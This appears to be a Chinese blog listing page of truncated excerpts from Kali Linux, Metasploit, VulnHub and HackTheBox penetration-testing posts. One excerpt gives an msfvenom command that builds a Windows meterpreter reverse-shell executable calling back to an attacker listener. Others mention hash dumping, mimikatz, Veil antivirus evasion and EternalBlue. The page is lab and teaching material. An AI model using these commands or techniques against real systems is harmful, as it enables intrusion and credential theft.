写在开头 本篇博客在自己的理解之上根据大佬红队笔记的视频进行打靶,详述了…
【安全】awvs使用(二)
目录
一、设置目标
二、设置登录
三、扫描引擎 四、开启扫描
五、扫描结束 六、报告 前言:怎么使用awvs进行扫描出报告呢? 一、设置目标 二、设置登录
因为扫描的网站需要登录的,这里需要设置这个 三、扫描引擎 四、开启扫描 翻译的页面…
Kali渗透Windows服务器
这个实验主要让我们学习漏洞扫描技术基本原理,了解其在网络攻防中的作用,掌握使用Kali中的Metasploit对目标主机渗透,并根据报告做出相应的防护措施。
本次实战环境:Kali渗透Windows服务器
实战步骤一
本实验通过利用kali进行漏…
Kali-linux使用Maltego收集信息
Maltego是一个开源的漏洞评估工具,它主要用于论证一个网络内单点故障的复杂性和严重性。该工具能够聚集来自内部和外部资源的信息,并且提供一个清晰的漏洞分析界面。本节将使用Kali Linux操作系统中的Maltego,演示该工具如何帮助用户收集信息…
【kali学习笔记】信息收集之搜索引擎的使用技巧
一、Google 搜索引擎的使用技巧
1、Google 常用语法说明
site 指定域名 inurl URL 中存在的关键字页面 intext 网页内容里面的关键字 Filetype 指定文件类型 intitle 网页标题中的关键字 link 返回你所有的指定域名链接 info 查找指定站点信息 cache 搜索 Google 里的内容缓存…
Scapy 解析 pcap 文件从HTTP流量中提取图片
Scapy 解析 pcap 文件从HTTP流量中提取图片 前言一、网络环境示例二、嗅探流量示例三、pcap 文件处理最后参考 作者:高玉涵
时间:2023.9.17 10:25
环境:Linux kali 5.15.0-kali3-amd64,Python 3.11.4,scapy…
Kali-linux绕过Utilman登录
Utilman是Windows辅助工具管理器。该程序是存放在Windows系统文件中最重要的文件,通常情况下是在安装系统过程中自动创建的,对于系统正常运行来说至关重要。在Windows下,使用WindowsU组合键可以调用Utilman进程。本节将介绍绕过Utilman程序登…
metasploit 辅助模块简单使用
0x00:简介
metasploit 的 auxitiary 模块也就是辅助模块,可用来进行主机发现、端口扫描、服务发现、服务检测等。
0x01:使用
metasploit 包含了多个模块,每个模块下都有很多相应的脚本,这些脚本在使用的时候可以通过…
如何入门学习黑客技术?如何选择编程语言?如何选择适合黑客的操作系统?
‘ 一 ’
了解黑客技术的基础知识 学习黑客技术需要对网络安全和计算机系统有一定的了解。可以通过参加安全培训班、阅读专业书籍和学术论文、浏览网络安全博客和论坛等方式获取基础知识。涉及的内容包括网络协议、操作系统原理、计算机网络和编程等。 ‘ 二 ’
选择适合你的…
msf 使用 hashdump 和 wce 提取 hash
0x00:介绍
msf 在获取 shell 后为了更方便的进行渗透测试,可获取主机的 hash 以及域的 hash,即用户的密码,存在于 c 盘下的 windos 下的 system32 下的 config 下的 sam 文件中,以 hash 加密的方式存储,而…
Kali下卸载程序的方法
ali中主要为2种卸载方法: 1、apt 2、dpkg 使用apt的方式有:
apt-get remove [package]
apt-get remove --purge # ------(package 删除包,包括删除配置文件等)
apt-get autoremove --purge # ----(package 删除包及其依赖的软件包配置文件等…
kali 渗透工具 - mestaploit
永恒之蓝漏洞的小知识: 黑客通过改造 永恒之蓝 制作 wannacry 制作病毒入侵高校内网。
mestaploit 攻击永恒之蓝流程:
使用模块 msfconsole配置required 模块参数运行,开始监听主机
msfconsole 主要模块 - 选择使用模块
search ms17_01…
Kali安装后无法上网Kali安装搜狗输入法
在安装Kali_Linux时,在配置DHCP网络总是失败,于是跳过,先不进行配置,Kali安装完成后,发现无法上网,在网上找了好多资料,最终得以解决。 首先在Kali命令行输入:
cd /etc/network/int…
kali更新源遇到的问题——签名失效、文件过期、没有Release文件等
E: 错误,pkgProblemResolver::Resolve 发生故障E: xxx 的 Release 文件已经过期W: 目标 xx 在 xxx 和 xxx 中被配置了多次W: 签名无效 & E: 没有数字签名E: 仓库 xxx 没有 Release 文件 & N: 无法安全地用该源进行更新,所以默认禁用该源。 &…
如何把Kali Linux装进U盘或者移动硬盘并使其可以在UEFI的机器上启动使用
网上,书上都有把kali装进U盘或者移动硬盘作为便携式系统的教程,但是这只支持BIOSMBR的模式。现在的电脑都是UEFI主板了。如何制作一个便携式的Kali系统并使其支持UEFI的电脑呢?
准备工作:
0,一个移动硬盘或者性能好点…
kali linux添加软件源
刚刚安装kali时,软件源是空白或不好使用的。可以通过一下方法添加国内软件源:
使用文本编辑器打开/etc/apt/sources.list,例如下面使用leafpad打开:
sudo leafpad /etc/apt/sources.list
然后把以下地址粘贴至末尾(…
kali 2020最新源
11182020KALI源 1.更新软件源 sudo vim /etc/apt/sources.list 2.选择比较合适的源(选择一个即可) #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib…
默认安装的 phpMyAdmin 会存在哪些安全隐患
0x00:简介
phpMyAdmin 大家很熟悉了,很多服务器都会默认安全,用来管理数据库。默认安装的情况下会存在一些安全隐患。
0x01:隐患
首先是默认的 setup 目录,phpMyAdmin 安装后的 setup 目录可以直接访问,…
解决Kali 启动的NetWorkManager.service Error
错误信息如图: relocation error:/lib/x86_64-linux/libgnutls.so.30:symbol _idn2_punycode_decode version IDN2_0.0.0 not defined in file libidn2.so.0 with link time reference 下载libidn2-0_2.0.5-1_amd64.deb,使用dpkg -i 进行安装…
深入探索:Kali Linux 网络安全之旅
目录 前言
访问官方网站
导航到下载页面
启动后界面操作 前言
"Kali" 可能指的是 Kali Linux,它是一种基于 Debian 的 Linux 发行版,专门用于渗透测试、网络安全评估、数字取证和相关的安全任务。Kali Linux 旨在提供一系列用于测试网络和…
![[VulnHub靶机渗透] Nullbyte](https://img-blog.csdnimg.cn/direct/4d68d19fc4854301aa5698e74d2e1729.png)
[VulnHub靶机渗透] Nullbyte
🍬 博主介绍👨🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收…
metasploit漏洞利用模块的简单使用
0x00:简介
exploits 是漏洞利用模块,漏洞利用是攻击者利用服务器的漏洞进行攻击的一种行为,其中包含了主流漏洞的攻击代码。
0x01:使用
以 metasploitable2 为例,刚开始,可以通过 nmap 来查看下靶机的一…
Burp Suite详细安装
如何在Windows平台下安装Burpsuite
1因为burpsuite是在JAVA环境下运行的,所以首先应该配置好JAVA环境
2 软件链接:https://pan.baidu.com/s/1rqscUNR70rXBz4Qb3BRI-g 提取码:9kr7 内涵JDK8 一 ,安装jdk
jdk环境变量
本文链接…
Kali-linux无线网络嗅探工具Kismet
如果要进行无线网络渗透测试,则必须先扫描所有有效的无线接入点。刚好在Kali Linux中,提供了一款嗅探无线网络工具Kismet。使用该工具可以测量周围的无线信号,并查看所有可用的无线接入点。本节将介绍使用Kismet工具嗅探无线网络。
…
《metasploit渗透测试魔鬼训练营》学习笔记第六章--客户端渗透
四.客户端攻击 客户端攻击与服务端攻击有个显著不同的标识,就是攻击者向用户主机发送的恶意数据不会直接导致用户系统中的服务进程溢出,而是需要结合一些社会工程学技巧,诱使客户端用户去访问这些恶意数据,间接发生攻击。 4.1客户…
Kali-linux使用Aircrack-ng工具破解无线网络
Aircrack-ng是一款基于破解无线802.11协议的WEP及WPA-PSK加密的工具。该工具主要用了两种攻击方式进行WEP破解。一种是FMS攻击,该攻击方式是以发现该WEP漏洞的研究人员名字(Scott Fluhrer、Itsik Mantin及Adi Shamir)所命名;另一种…
最新版Kali Purple超详细安装及配置教程-版本简介---(附下载链接)
目录
一、Kali Purple简介
二、官网下载Kali Purple映像
三、创建Kali Purple虚拟机
四、打开Kali Purple进行内部配置
五、内部展示 一、Kali Purple简介 Kali Linux在庆祝十周年之际,引入了一个新的Kali Linux风味,称为Kali Purple,重…
信息系统安全——基于 KALI 和 Metasploit 的渗透测试
实验 2 基于 KALI 和 Metasploit 的渗透测试 2.1 实验名称 《基于 KALI 和 Metasploit 的渗透测试》 2.2 实验目的 1 、熟悉渗透测试方法 2 、熟悉渗透测试工具 Kali 及 Metasploit 的使用 2.3 实验步骤及内容 1 、安装 Kali 系统 2 、选择 Kali 中 1-2 种攻击工具,…
VMware/kali使用小贴士(持续更新(吧
关于截屏
kali截屏快捷键 关于虚拟机和主机切屏
因为kali不全屏看还挺难受的,全屏了又很难切回主机 虚拟机全屏时,可以先Alt Ctrl取消对VM的控制(光标移到上方白条也是同理),然后Alt Tab切换窗口
【HackTheBox MonitorsTwo】打靶记录
信息搜集
1、nmap 扫描一波
└─# nmap -sC -sV 10.10.11.211
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-14 20:55 EDT
Nmap scan report for 10.10.11.211
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
2…
Mac下安装Kali Linux 2020.1 (注意默认用户名密码不再是root toor)
简介
Kali是一个基于Debian的Linux 发行版,新一代的Backtrack,集成了尽可能多的安全、渗透工具,堪称黑客的武器库。
在网络安全时代,有必要了解一下,于是在Mac下用虚拟机安装了Kali Linux 2020.1。 (注意…
Kali Linux 安装搭建 hadoop 平台 调用 wordcount 示例程序 详细教程
步骤一:
目标:*安装虚拟机,在自己虚拟机上完成hadoop的伪分布式安装。(安装完成后要检查)*
1)前期环境准备:(虚拟机、jdk、ssh) 2)SSH相关配置
安装SSH Se…
kali骚操作之系统字典
目录一、kali默认字典简单介绍二、关于johnjohn破解kali密码实战三、kali字典生成工具——crunchkali默认字典目录: /usr/share/wordlists/
一、kali默认字典简单介绍
dirb big.txt #大的字典 small.txt #小的字典 catala.txt #项目配置字典 common.txt #公共字典…
VPS安装Linux系统_虚拟机方式
1,官网下载Linux镜像 2,查看VPS厂商支持的镜像格式,//RAW格式|QCOW2格式,VHD格式,VMDK格式 3,VirtualBox创建虚拟机并记录存放虚拟机安装路径,创建对应的虚拟硬盘文件类型 //虚拟硬盘…
kali4.0 下安装QQ 2012
kali4.0 下安装QQ 2012
(1)资源下载
a:QQ下载地址:
链接: http://pan.baidu.com/s/1blF6AM 密码: 56fk
b:视频下载地址
链接: http://pan.baidu.com/s/1eQUC27w 密码: f5b8
(2)安装方法:
a:WineQQ20…
bugku--source
dirsearch扫一下 题目提示源代码(source)
也就是源代码泄露,然后发现有.git 猜到是git泄露 拼接后发现有文件 但是点开啥也没有
kali里面下载下来
wegt -r 下载网站的所有内容 ls 查看目录
cd 进入到目录里面 gie reflog 引用日志使用…
信息搜集 - 四层发现 Scapy
0x00:简介
Scapy 不仅可以在二层、三层去发现目标主机,也可以在四层去应用。主要用到的协议是 TCP 和 UDP。
0x01:scapy tcp
首先,构造一个 tcp 包,tcp 单独是不能发送的,所以需要结合一下三层的 ip 协议…
binwalk命令参数中文说明
binwalk参数英文说明:
Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ...Signature Scan Options: -B, --signature Scan target file(s) for common file signatures -R, --raw<str> Scan target file(s) for the spec…
Kali-linux免杀Payload生成工具Veil
Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件。本节将介绍Veil工具的安装及使用。
在Kali Linux中,默认没有安装Veil工具。这里首先安装Veil工具,执行如下所示的命令:
roo…
Kali——关于Kali的下载与安装
Kali的下载安装 目录
Kali的下载安装
一:写在前面:
二:下载地址:
下载地址:https://www.kali.org/get-kali/
官网下载:
三:kali版本介绍:
1.三种版本的区别:
四&…
kali Linux2019 安装(中文)搜狗输入法
之前因为认真学习JavaEE暂时放手了kali的学习,现在重新入手一下Kali。安装kali第一件问题就是中文输入的问题,当然你也可以使用系统自带的(Ubuntu有,kali我没试过),不过还是推荐搜狗输入法。
写这篇文章的…
【Linux】Kali(WSL)基本操作与网络安全入门
😏★,:.☆( ̄▽ ̄)/$:.★ 😏 这篇文章主要介绍WSL安装Kali及基本操作。 学其所用,用其所学。——梁启超 欢迎来到我的博客,一起学习,共同进步。 喜欢的朋友可以关注一下,下次更新不迷路…
Linux 基础命令,永久更新
移动:
ctrlalt ------------------------------------------光标移除虚拟机 cd /目录/----------------------------------------进入指定目录 cd … --------------------------------------------退出到上层目录 cd -------------------------------------------…
Kali Linux 2020.4 安装教程 超级详细 适合新手入门
Kali Linux 安装教程一、虚拟机配置二、Kali Linux配置三、更新软件包更新时间:2021年2月2日使用版本:2020.4镜像官方下载地址:https://www.kali.org/downloads 一、虚拟机配置
使用虚拟机软件:VMware Workstation Pro 16 首先点…
kali内置超好用的代理工具proxychains
作者:Eason_LYC 悲观者预言失败,十言九中。 乐观者创造奇迹,一次即可。 一个人的价值,在于他所拥有的。所以可以不学无术,但不能一无所有! 技术领域:WEB安全、网络攻防 关注WEB安全、网络攻防。…
Android Termux 安装Kali Linux 或 kali Nethunter史诗级详细教程
Android Termux 安装Kali Linux 或 kali Nethunter史诗级详细教程 一、Termux配置1、下载安装2、配置存储和换源3、基本工具安装 二、Kali Linux安装1、下载安装脚本2、更换apt源3、图形化安装 三、Kali Nethunter安装1、下载安装脚本2、更换apt源3、图形化连接 四、报错汇总1、…
网络安全-01-VMware安装Kali部署DVWA
网络安全-01-VMware安装Kali&部署DVWA 🔻一、Kali简介&下载📗 二、VMware安装Kali📰 2.1 新建虚拟机📰 2.2 开始安装Kali📰 2.3 更换apt源为国内源📰 2.4 启动mysql-这里使用自带的maridb…
Kali Linux 2023.4 已经发布了!
开发人员推出了 Kali Linux 2023.4,这是2023 年发行版的第四个也是最后一个版本。
新产品已经可供下载,包含15 个新工具和 GNOME 45。
Offective Security 团队报告称,在今年的最终版本中,操作系统中并没有添加太多新功能&…
Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1
文章目录 方式一信息收集主机发现端口扫描目录扫描wpscan工具 漏洞利用msf工具数据库权限用户权限root提权 方式二信息收集gobuster扫描wpscan扫描 漏洞利用POC 靶机文档:HarryPotter: Aragog (1.0.2) 下载地址:Download (Mirror) 方式一
信息收集
主机…
CFS三层靶机内网渗透
CFS三层靶机内网渗透 一、靶场搭建1.基础参数信息2.靶场搭建2.1网卡配置2.2Target1配置2.2.1 网卡配置2.2.2 Target1 BT配置 2.3Target2配置2.3.1 网卡配置2.3.2 Target2 BT配置 2.4Target3配置 二、内网渗透Target11.1信息收集1.1.1IP收集1.1.2端口收集1.1.3目录收集 1.2 webs…
kali功能介绍及安装(超详细)
一kali简介
1.描述
Kali Linux是一个操作系统(2013-03-13诞生)
基于Debian Linux的发行版
基于包含了约600个安全工具
(- 省去了繁琐的安装、编译、配置、更新步骤)
(- 为所有工具运行提供了一个稳定一致的操作系统基础)
它的前身是BackTrack
官方机构…
渗透测试框架权限维持技术——Persistence模块
测试环境:
kali win7
测试步骤:
1.利用MSF编写远控程序
msfvenom -p windows/meterpreter/reverse_tcp lhost10.0.0.163 lport55555 -f exe -o 5555.exe-p 漏洞利用payload
lhost 监听地址(kali地址)
lport 监听端口…
Kali-linux破解纯文本密码工具mimikatz
mimikatz是一款强大的系统密码破解获取工具。该工具有段时间是作为一个独立程序运行。现在已被添加到Metasploit框架中,并作为一个可加载的Meterpreter模块。当成功的获取到一个远程会话时,使用mimikatz工具可以很快的恢复密码。本节将介绍使用mimikatz工…
Kali之BurpSuite_pro安装配置
文章目录 配置jdk环境安装BurpSuitePro设置快捷方式启动方式 BurpSuite2021专业版本地址: 下载链接:https://pan.baidu.com/s/1PjzcukRDoc_ZFjrNxI8UjA 提取码:nwm7 我的安装工具都在/home/kali/tools/
解压后我放在burpsuite_pro目录下 把j…
Kali 安装 openvpn3 报错
报错:
下列软件包有未满足的依赖关系:openvpn3 : 依赖: libjsoncpp24 (> 1.9.4) 但无法安装它依赖: libtinyxml2-8 (> 8.0.0) 但无法安装它
E: 无法修正错误,因为您要求某些软件包保持现状,就是它们破坏了软件包间的依赖关…
红队打靶:Me and My Girlfriend打靶思路详解(vulnhub)
目录
写在开头
第一步:主机发现和端口扫描
第二步:Web渗透(修改XFF代理)
第三步:数据库手工枚举
第四步:sudo php提权
总结与思考
写在开头 本篇博客在自己的理解之上根据大佬红队笔记的视频进行…